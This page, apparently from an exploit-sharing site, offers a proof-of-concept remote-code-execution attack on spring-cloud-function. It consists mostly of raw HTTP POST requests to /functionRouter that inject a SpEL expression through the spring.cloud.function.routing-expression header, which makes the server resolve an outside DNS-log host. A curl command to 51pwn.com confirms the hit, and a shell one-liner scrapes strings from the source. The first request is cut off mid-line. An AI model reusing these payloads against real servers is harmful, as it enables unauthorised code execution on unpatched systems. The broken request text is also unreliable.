Spring-Spel-0Day-Poc – Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
spring-cloud/spring-cloud-function
get path lists for test
find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" ./=>|,:}+)'"'"']{8,})"'|sort -u|sed 's/"//g'
...
functionRouter
uppercase
lowercase
...
poc1
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac poc2
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5
51pwn
check
curl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'
Download Spring-Spel-0Day-Poc
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.